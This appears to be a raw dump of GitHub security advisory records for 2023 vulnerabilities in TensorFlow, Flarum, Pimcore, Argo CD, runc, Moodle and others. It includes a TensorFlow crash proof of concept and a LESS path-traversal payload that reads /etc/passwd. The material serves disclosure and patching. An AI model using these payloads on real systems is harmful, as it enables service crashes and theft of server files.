{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:05:30Z', 'nvd_published_at': '2023-03-01T16:15:00Z'}
|
1.4.0
|
GHSA-647v-r7qq-24fh
|
2023-03-30T16:59:44Z
|
2023-03-24T21:54:42Z
| null |
['CVE-2023-25673']
|
TensorFlow has Floating Point Exception in TensorListSplit with XLA
|
### Impact
FPE in TensorListSplit with XLA
```python
import tensorflow as tf
func = tf.raw_ops.TensorListSplit
para = {'tensor': [1], 'element_shape': -1, 'lengths': [0]}
@tf.function(jit_compile=True)
def fuzz_jit():
y = func(**para)
return y
print(fuzz_jit())
```
### Patches
We have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa).
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by r3pwnx
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-647v-r7qq-24fh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25673'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:54:42Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-c6wg-cm5x-rqvj
|
2023-03-07T17:38:38Z
|
2023-03-07T17:38:38Z
| null |
['CVE-2023-25806']
|
OpenSearch has time discrepancy in authentication responses
|
### Impact
There is an observable discrepancy in the authentication response time between calls where the user provided exists and calls where it does not. This issue only affects calls using the internal basic identity provider (IdP), and not other externally configured IdPs.
### Patches
OpenSearch 1.3.9 and 2.6.0
### Workarounds
None.
### References
If you have any questions or comments about this advisory, please contact AWS/Amazon Security using our issue reporting page [1] or directly via email [2]. Please do not create a public GitHub issue.
[1] AWS Security issue reporting page: https://aws.amazon.com/security/vulnerability-reporting/
[2] AWS Security email: [[email protected]](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/security/advisories/GHSA-c6wg-cm5x-rqvj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25806'}, {'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/pull/2472'}, {'type': 'PACKAGE', 'url': 'https://github.com/opensearch-project/security'}]
|
{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T17:38:38Z', 'nvd_published_at': '2023-03-02T04:15:00Z'}
|
1.4.0
|
GHSA-3r48-3m8r-4r9w
|
2023-04-04T17:38:51Z
|
2023-03-28T15:30:18Z
| null |
['CVE-2023-28326']
|
Apache OpenMeetings missing authentication and can allow user impersonation
|
The Apache Software Foundation's OpenMeetings from 2.0.0 before 7.0.0 is missing authentication on meeting invitation URLs. An invitation URL contains a hash that automatically logs in as the invited user. An unauthorized user could obtain this URL and log in to the meeting as an invited user, in effect elevating their privileges in the meeting room. OpenMeetings 7.0.0 disables this option if a contact is not selected.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.openmeetings:openmeetings-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '7.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28326'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/1fb71af36'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/openmeetings'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/r9vn12dp5yofn1h3wd5x4h7c3vmmr5d9'}]
|
{'cwe_ids': ['CWE-306'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-04T17:38:51Z', 'nvd_published_at': '2023-03-28T13:15:00Z'}
|
1.4.0
|
GHSA-9hj7-v56g-rhf6
|
2023-04-07T21:24:51Z
|
2023-03-31T12:30:16Z
| null |
['CVE-2023-1774']
|
Mattermost fails to properly authentication inviter's permissions to private channel
|
When processing an email invite to a private channel on a team, Mattermost fails to validate the inviter's permission to that channel, allowing an attacker to invite themselves to a private channel.
[Issue Identifier](https://mattermost.com/security-updates/): MMSA-2023-00137
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.10.10'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.7.0'}, {'fixed': '7.7.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.7.1'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.1.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.1.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.39.3'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.7.2'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1774'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates/'}, {'type': 'PACKAGE', 'url': 'github.com/mattermost/mattermost-server'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T21:24:51Z', 'nvd_published_at': '2023-03-31T12:15:00Z'}
|
1.4.0
|
GHSA-qxcw-rf4v-hp26
|
2023-03-06T01:44:47Z
|
2023-03-01T23:03:33Z
| null |
['CVE-2023-1117']
|
Pimcore vulnerable to Cross Site Scripting in image/video thumbnail config
|
### Impact
An attacker can use XSS to send a malicious script to any user through Image/Video thumbnail config
### Patches
Update to version 10.5.18 or apply this patch manually https://github.com/pimcore/pimcore/pull/14472.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14472.patch manually.
### References
https://huntr.dev/bounties/e8c0044d-a31b-4347-b2d5-59fbf492da39/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.18'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-qxcw-rf4v-hp26'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1117'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/b9ba69f66d6a9986fb36f239661b98cd33a89853'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e8c0044d-a31b-4347-b2d5-59fbf492da39'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T23:03:33Z', 'nvd_published_at': '2023-03-01T14:15:00Z'}
|
1.4.0
|
GHSA-qwqh-hm9m-p5hr
|
2023-04-03T13:07:41Z
|
2023-03-30T06:30:25Z
| null |
['CVE-2023-26118']
|
angular vulnerable to regular expression denial of service via the <input type="url"> element
|
All versions of the package angular are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'angular'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26118'}, {'type': 'PACKAGE', 'url': 'https://github.com/angular/angular.js'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-5406326'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-5406328'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-5406327'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-ANGULAR-3373046'}, {'type': 'WEB', 'url': 'https://stackblitz.com/edit/angularjs-vulnerability-inpur-url-validation-redos'}]
|
{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-03T13:07:41Z', 'nvd_published_at': '2023-03-30T05:15:00Z'}
|
1.4.0
|
GHSA-vhm8-wwrf-3gcw
|
2023-03-13T20:52:11Z
|
2023-03-13T20:52:11Z
| null |
['CVE-2023-27577']
|
Path Traversal Vulnerability in `LESS` Parser allows reading of sensitive server files
|
### Impact
If an admin account has already been compromised by an attacker, the `LESS` parser can be exploited to read sensitive files on the server through the use of path traversal techniques.
An attacker can achieve this by providing an absolute path to a sensitive file in the custom `LESS` setting, which the `LESS` parser will then read. For example, an attacker could use the following code to read the contents of the `/etc/passwd` file:
```less
@import (inline) '/etc/passwd';
.test {
content: data-uri('/etc/passwd');
}
```
### Patches
The vulnerability has been addressed in version `1.7`. Users should upgrade to this version to mitigate the vulnerability.
### Workarounds
Users can mitigate the vulnerability by ensuring that their admin accounts are secured with strong passwords and other best practices for account security. Additionally, users can limit the exposure of sensitive files on the server by implementing appropriate file permissions and access controls.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'flarum/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/flarum/framework/security/advisories/GHSA-vhm8-wwrf-3gcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27577'}, {'type': 'WEB', 'url': 'https://github.com/flarum/framework/commit/1761660c98ea5a3e9665fb8e6041d1f2ee62a444'}, {'type': 'PACKAGE', 'url': 'https://github.com/flarum/flarum-core'}, {'type': 'WEB', 'url': 'https://github.com/flarum/flarum-core/releases/tag/v1.7.0'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:52:11Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
|
1.4.0
|
GHSA-qcrj-6ffc-v7hq
|
2023-03-07T23:59:37Z
|
2023-03-03T22:45:50Z
| null |
['CVE-2023-23927']
|
Craft CMS Stored Cross-site Scripting Injection Vulnerability
|
### Summary
_When you insert a payload inside a label name or instruction of an entry type, an XSS happens in the quick post widget on the
admin dashboard._
### PoC
[_Complete instructions, including specific configuration details, to reproduce the vulnerability._](https://user-images.githubusercontent.com/53917092/215604129-d5b75608-5a24-4eb3-906f-55b192310298.mp4)
### Impact
Tested with the free version of Craft CMS 4.3.6.1
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-RC1'}, {'fixed': '4.3.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.24'}, {'fixed': '3.7.64'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-qcrj-6ffc-v7hq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23927'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#437---2023-02-03'}, {'type': 'WEB', 'url': 'https://user-images.githubusercontent.com/53917092/215604129-d5b75608-5a24-4eb3-906f-55b192310298.mp4'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:45:50Z', 'nvd_published_at': '2023-03-03T22:15:00Z'}
|
1.4.0
|
GHSA-2q5c-qw9c-fmvq
|
2023-03-27T22:11:08Z
|
2023-03-23T19:49:11Z
| null |
['CVE-2022-41354']
|
Argo CD authenticated but unauthorized users may enumerate Application names via the API
|
### Impact
All versions of Argo CD starting with v0.5.0 are vulnerable to an information disclosure bug allowing unauthorized users to enumerate application names by inspecting API error messages. An attacker could use the discovered application names as the starting point of another attack. For example, the attacker might use their knowledge of an application name to convince an administrator to grant higher privileges (social engineering).
Many Argo CD API endpoints accept an application name as the only parameter. Since Argo CD RBAC requires both the application name and its configured project name (and, if apps-in-any-namespace is enabled, the application's namespace), Argo CD fetches the requested application before performing the RBAC check. If the application does not exist, the API returns a "not found". If the application does exist, and the user does not have access, the API returns an "unauthorized" error. By trial and error, an attacker can infer which applications exist and which do not.
Note that application resources are not fetched for API calls from _unauthenticated_ users. If your Argo CD instance is accessible from the public internet, unauthenticated users will not be able to cause Argo CD to make Kubernetes API calls.
The patch changes API behavior to return "unauthorized" both when the application is missing and when the user is not authorized to access it. **This change in API behavior may impact API clients.** Check your code to make sure it will handle the new API behavior properly.
### Patches
A patch for this vulnerability has been released in the following Argo CD versions:
* v2.6.7
* v2.5.16
* v2.4.28
### Workarounds
There are no workarounds besides upgrading.
### Credits
Thank you to bean.zhang of HIT-IDS ChunkL Team who discovered the issue and reported it confidentially according to our [guidelines](https://github.com/argoproj/argo-cd/blob/master/SECURITY.md#reporting-a-vulnerability).
### For more information
* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)
* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'last_affected': '1.8.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.16'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.28'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/security/advisories/GHSA-2q5c-qw9c-fmvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41354'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/3a28c8a18cc2aa84fe81492625545d25c7a90bc3'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/releases/tag/v2.4.28'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/releases/tag/v2.5.16'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/releases/tag/v2.6.7'}, {'type': 'WEB', 'url': 'https://github.com/chunklhit/cve/blob/master/argo/argo-cd/application_enumeration.md'}, {'type': 'WEB', 'url': 'http://argo.com'}]
|
{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T19:49:11Z', 'nvd_published_at': '2023-03-27T14:15:00Z'}
|
1.4.0
|
GHSA-9jh3-4pc9-hq29
|
2023-03-15T19:18:36Z
|
2023-03-09T06:30:21Z
| null |
['CVE-2023-26109']
|
node-bluetooth-serial-port is vulnerable to Buffer Overflow via the findSerialPortChannel
|
All versions of the package node-bluetooth-serial-port are vulnerable to Buffer Overflow via the findSerialPortChannel method due to improper user input length validation.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'node-bluetooth-serial-port'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26109'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinyprinter/node-bluetooth-serial-port'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-NODEBLUETOOTHSERIALPORT-3311820'}]
|
{'cwe_ids': ['CWE-120'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-09T20:18:35Z', 'nvd_published_at': '2023-03-09T05:15:00Z'}
|
1.4.0
|
GHSA-f46j-r7q3-6cm2
|
2023-03-13T15:35:22Z
|
2023-03-06T21:30:18Z
| null |
['CVE-2021-36393']
|
Moodle SQL Injection vulnerability
|
In Moodle, an SQL injection risk was identified in the library fetching a user's recent courses.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36393'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424798'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:59:27Z', 'nvd_published_at': '2023-03-06T21:15:00Z'}
|
1.4.0
|
GHSA-vf7q-g2pv-jxvx
|
2023-03-22T21:40:51Z
|
2023-03-22T21:23:16Z
| null |
['CVE-2023-28438']
|
Pimcore vulnerable to improper quoting of filters in Custom Reports
|
### Impact
Since a user with 'report' permission can already write arbitrary SQL queries and given the fact that this endpoint is using the GET method (no CSRF protection), an attacker can inject an arbitrary query by manipulating a user to click on a link.
The impact of this path traversal and arbitrary extension is limited (creation of arbitrary files and
appending data to existing files) but when combined with the SQL Injection, the exported data can be controlled and a webshell can be uploaded. Attackers can use that to execute arbitrary PHP code on the server with the permissions of the webserver.
### Patches
Update to version 10.5.19 or apply these patch manually https://github.com/pimcore/pimcore/commit/d1abadb181c88ebaa4bce1916f9077469d4ea2bc.patch
https://github.com/pimcore/pimcore/commit/7f788fa44bc18bc1c9182c25e26b770a1d30b62f.patch
### Workarounds
Apply patches manually:
https://github.com/pimcore/pimcore/commit/d1abadb181c88ebaa4bce1916f9077469d4ea2bc.patch
https://github.com/pimcore/pimcore/commit/7f788fa44bc18bc1c9182c25e26b770a1d30b62f.patch
### References
#14526
#14498
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-vf7q-g2pv-jxvx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28438'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14526'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/d1abadb181c88ebaa4bce1916f9077469d4ea2bc.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-22T21:23:16Z', 'nvd_published_at': '2023-03-22T21:15:00Z'}
|
1.4.0
|
GHSA-m8cg-xc2p-r3fc
|
2023-03-30T20:17:24Z
|
2023-03-30T20:17:24Z
| null |
['CVE-2023-25809']
|
rootless: `/sys/fs/cgroup` is writable when cgroupns isn't unshared in runc
|
### Impact
It was found that rootless runc makes `/sys/fs/cgroup` writable in following conditons:
1. when runc is executed inside the user namespace, and the `config.json` does not specify the cgroup namespace to be unshared (e.g.., `(docker|podman|nerdctl) run --cgroupns=host`, with Rootless Docker/Podman/nerdctl)
2. or, when runc is executed outside the user namespace, and `/sys` is mounted with `rbind, ro` (e.g., `runc spec --rootless`; this condition is very rare)
A container may gain the write access to user-owned cgroup hierarchy `/sys/fs/cgroup/user.slice/...` on the host .
Other users's cgroup hierarchies are not affected.
### Patches
v1.1.5 (planned)
### Workarounds
- Condition 1: Unshare the cgroup namespace (`(docker|podman|nerdctl) run --cgroupns=private)`. This is the default behavior of Docker/Podman/nerdctl on cgroup v2 hosts.
- Condition 2 (very rare): add `/sys/fs/cgroup` to `maskedPaths`
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25809'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/runc'}]
|
{'cwe_ids': ['CWE-281'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T20:17:24Z', 'nvd_published_at': '2023-03-29T19:15:00Z'}
|
1.4.0
|
GHSA-hwj7-frgj-7829
|
2023-03-23T16:30:20Z
|
2023-03-21T06:30:17Z
| null |
['CVE-2023-1537']
|
Answer vulnerable to Authentication Bypass by Capture-replay
|
Authentication Bypass by Capture-replay in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1537'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/813ad0b9894673b1bdd489a2e9ab60a44fe990af'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/171cde18-a447-446c-a9ab-297953ad9b86'}]
|
{'cwe_ids': ['CWE-294'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:32:10Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-96hp-38wx-j3wc
|
2023-03-06T01:45:00Z
|
2023-03-01T23:04:11Z
| null |
['CVE-2023-1116']
|
Pimcore vulnerable to Cross Site Scripting in Email Blacklist
|
### Impact
The attacker can execute arbitrary JavaScript and steal Cookies information and use them to hijack the user's session.
### Patches
Update to version 10.5.18 or apply this patch manually https://github.com/pimcore/pimcore/pull/14467.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14467.patch manually.
### References
https://huntr.dev/bounties/3245ff99-9adf-4db9-af94-f995747e09d1/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.18'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-96hp-38wx-j3wc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1116'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14467.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/f6d322efa207a737eedd8726b7c92e957a83341e'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3245ff99-9adf-4db9-af94-f995747e09d1'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T23:04:11Z', 'nvd_published_at': '2023-03-01T14:15:00Z'}
|
1.4.0
|
GHSA-89p3-9j8c-fqh4
|
2023-03-16T21:41:24Z
|
2023-03-12T06:30:21Z
| null |
['CVE-2021-46876']
|
User account enumeration in eZ Publish Ibexa Kernel
|
This Security Advisory is about a vulnerability in eZ Platform v1.13, v2.5, and v3.2, and in Ibexa DXP and Ibexa Open Source v3.3. The /user/sessions endpoint can let an attacker detect if a given username or email refers to a valid account. This can be detected through differences in the response data or response time of certain requests. The fix ensures neither attack is possible. The fix is distributed via Composer.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.13.0'}, {'fixed': '6.13.8.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.15.1'}]}]}]
|
